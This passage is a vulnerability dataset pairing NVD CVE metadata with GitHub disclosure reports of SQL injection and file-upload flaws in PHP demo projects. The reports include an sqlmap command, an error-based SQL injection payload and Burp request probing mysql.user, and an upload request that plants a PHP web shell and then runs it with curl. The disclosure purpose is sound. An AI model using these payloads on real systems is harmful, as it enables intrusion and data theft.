"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LiuYongXiang-git/cve/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268460"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268460"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356177"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/LiuYongXiang-git/cve/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268460"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268460"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356177"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_book_store_project:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4AD59DD3-AEC8-4FEB-8580-5501B34821AE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/LiuYongXiang-git/cve/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"LiuYongXiang-git",
"cve"
] | # Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 book.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online-Bookstore-Project-In-PHP-Source-Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ dlss
## Vulnerable File
+ book.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'book.php' file of the 'Online-Bookstore-Project-In-PHP-Source-Code' project. The reason for this issue is that attackers inject malicious code from the parameter "bookisbn" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="672" alt="1" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/c2c8d256-5736-41cc-8b22-f4922b213085">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "bookisbn" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Online-Bookstore-Project-In-PHP-Source-Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
+ UNION query
## Vulnerability location:
+ 'bookisbn' parameter
## Payload:
<img width="344" alt="2" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/b882dc18-b0aa-47e7-827c-7d85cd130249">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u http://192.168.210.199:1213/book.php?bookisbn=978-1-1180-2669-4 --batch --dbs
```
<img width="337" alt="3" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/831b8780-3872-4f30-ae46-3ff84eb97ed6">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 book.php SQL injection | https://api.github.com/repos/LiuYongXiang-git/cve/issues/3/comments | 0 | 2024-06-13T10:52:17Z | 2024-06-13T10:52:18Z | https://github.com/LiuYongXiang-git/cve/issues/3 | 2,350,828,578 | 3 | 6,068 |
CVE-2024-5985 | 2024-06-14T02:15:10.713 | A vulnerability classified as critical has been found in SourceCodester Best Online News Portal 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268461 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/CveSecLook/cve/issues/45"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268461"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268461"
},
{
"source": "cna@vuldb.com",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356239"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/CveSecLook/cve/issues/45"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268461"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268461"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?submit.356239"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:best_online_news_portal_project:best_online_news_portal:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "83739685-D8B6-4A14-89A7-C1AC4F28260A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/45 | [
"Exploit"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Best online news portal project in php free download /admin/index.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ CASAP Automated Enrollment System using PHP/MySQLi with Source Code
## Vendor Homepage
+ https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ xuanluansec
## Vulnerable File
+ /admin/index.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ The PHP method in line 10 of the /admin/index.php file retrieves user input from the POST element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately the database query in the PHP method on line 14. This may lead to SQL injection attacks.
+ 
## Impact
+ Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.
# DESCRIPTION
+ xuanluansec has discovered a serious issue in "Best online news portal project in php free download" that can allow attackers to obtain large amounts of database content through SQL injection attacks.
# Vulnerability details and POC
## Payload
+ admin1'||(SELECT 0x57466361 WHERE 3243=3243 AND (SELECT 3588 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,9341,NULL))) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
+ 
## Burp Suite (POC)
```
POST /admin/ HTTP/1.1
Host: www.101news.com:8120
Content-Length: 328
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.101news.com:8120
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.101news.com:8120/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=mgnba8pjlh638vt3ipj6ue06ph
Connection: close
username=admin1'||(SELECT 0x48577666 WHERE 4844=4844 AND (SELECT 7969 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=admin&login=
```
+ 
+ Here is the MySQL database name obtained from the sqlmap attack
+ 
| SourceCodester Best online news portal project in php free download /admin/index.php SQL injection | https://api.github.com/repos/CveSecLook/cve/issues/45/comments | 0 | 2024-06-13T11:20:09Z | 2024-06-13T11:20:09Z | https://github.com/CveSecLook/cve/issues/45 | 2,350,883,829 | 45 | 6,069 |
CVE-2024-37831 | 2024-06-14T20:15:11.777 | Itsourcecode Payroll Management System 1.0 is vulnerable to SQL Injection in payroll_items.php via the ID parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ganzhi-qcy/cve/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ganzhi-qcy/cve/issues/5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:payroll_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "5B5AA5E2-02CB-46E7-9DC9-84E4FA6D227A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ganzhi-qcy/cve/issues/5 | [
"Third Party Advisory"
] | github.com | [
"ganzhi-qcy",
"cve"
] | 1. [CVE ID]
2. CVE-CVE-2024-37831
3. submitter:quchunyi,yaomingjun,luowenwei,zhangxin,chenshan,tianbeibei,fengyilin,maqiutong,fuweidong,lishudong at Guangzhou University
4. [PRODUCT]
5. Itsourcecode
6. [VERSION]
7. V1.0
8. [PROBLEM TYPE]
9. SQL Injection
10. [DESCRIPTION]
11. Itsourcecode Payroll Management System 1.0 is vulnerable to SQL
12. Injection in payroll_items.php via the ID parameter. | CVE-2024-37831 | https://api.github.com/repos/ganzhi-qcy/cve/issues/5/comments | 0 | 2024-06-14T05:55:36Z | 2024-10-04T07:37:20Z | https://github.com/ganzhi-qcy/cve/issues/5 | 2,352,575,813 | 5 | 6,070 |
CVE-2024-6008 | 2024-06-15T15:15:51.033 | A vulnerability, which was classified as critical, was found in itsourcecode Online Book Store up to 1.0. Affected is an unknown function of the file /edit_book.php. The manipulation of the argument image leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268698 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/1902zdq/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268698"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268698"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357143"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/1902zdq/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268698"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268698"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357143"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:isourcecode:online_book_store_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "71AB5A7E-412A-4649-9E8D-465255D0757F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/1902zdq/cve/issues/1 | [
"Exploit",
"Technical Description",
"Third Party Advisory"
] | github.com | [
"1902zdq",
"cve"
] | # Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 edit_book.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Online-Bookstore-Project-In-PHP-Source-Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ zdq123
## Vulnerable File
+ edit_book.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ Unrestricted Upload
## Root Cause
+ In line 16 of the edit_book.php file,The input obtained through $- FILES is directly used to determine the storage location of the file, without conducting a complete security check. The specific code snippet is as follows:
<img width="580" alt="1" src="https://github.com/1902zdq/cve/assets/117020819/84defe02-4a22-4f56-aff9-6c46a5846ad2">
## Impact
+ Attackers can exploit this vulnerability to upload malicious files without restriction, which can lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Exploiting malicious files can lead to remote attacks on RCE
# DESCRIPTION
+ The file upload operation was triggered on line 16 of the "edit_book.php" file, and the uploaded file was received using the "$- FILES" variable. Due to the lack of appropriate input validation and cleaning, remote attackers only need to use regular user login to pass malicious payloads through this file upload function, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
```
POST /edit_book.php HTTP/1.1
Host: 192.168.210.199:1213
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------67818604130845076034240768557
Content-Length: 1699
Origin: http://192.168.210.199:1213
Connection: close
Referer: http://192.168.210.199:1213/admin_edit.php?bookisbn=978-1-49192-706-9
Upgrade-Insecure-Requests: 1
Priority: u=1
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="isbn"
978-1-49192-706-9
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="title"
C# 6.0 in a Nutshell, 6th Edition
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="author"
Joseph Albahari, Ben Albahari
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="image"; filename="123.php"
Content-Type: application/octet-stream
<?php system("ipconfig"); ?>
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="descr"
When you have questions about C# 6.0 or the .NET CLR and its core Framework assemblies, this bestselling guide has the answers you need. C# has become a language of unusual flexibility and breadth since its premiere in 2000, but this continual growth means there's still much more to learn.
Organized around concepts and use cases, this thoroughly updated sixth edition provides intermediate and advanced programmers with a concise map of C# and .NET knowledge. Dive in and discover why this Nutshell guide is considered the definitive reference on C#.
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="price"
20.00
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="publisher"
O'Reilly Media
-----------------------------67818604130845076034240768557
Content-Disposition: form-data; name="save_change"
Change
-----------------------------67818604130845076034240768557--
```
<img width="905" alt="2" src="https://github.com/1902zdq/cve/assets/117020819/569358a1-acb6-4753-b0a6-8e13901bcf6e">
<img width="563" alt="3" src="https://github.com/1902zdq/cve/assets/117020819/8c2547c0-e0d9-4879-8ba5-0b316c38e071">
## I successfully executed the PHP script on the terminal
```bash
curl http://192.168.210.199:1213/bootstrap/img/123.php
```
<img width="317" alt="4" src="https://github.com/1902zdq/cve/assets/117020819/09a1a521-d6ab-404c-9325-19ed3dfc8317"> | Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 edit_book.php Unrestricted Upload | https://api.github.com/repos/Wumshi/cve/issues/1/comments | 0 | 2024-06-14T06:23:27Z | 2024-06-14T06:23:27Z | https://github.com/Wumshi/cve/issues/1 | 2,352,612,520 | 1 | 6,071 |
CVE-2024-6009 | 2024-06-15T16:15:09.830 | A vulnerability has been found in itsourcecode Event Calendar 1.0 and classified as critical. Affected by this vulnerability is the function regConfirm/regDelete of the file process.php. The manipulation of the argument userId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268699. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
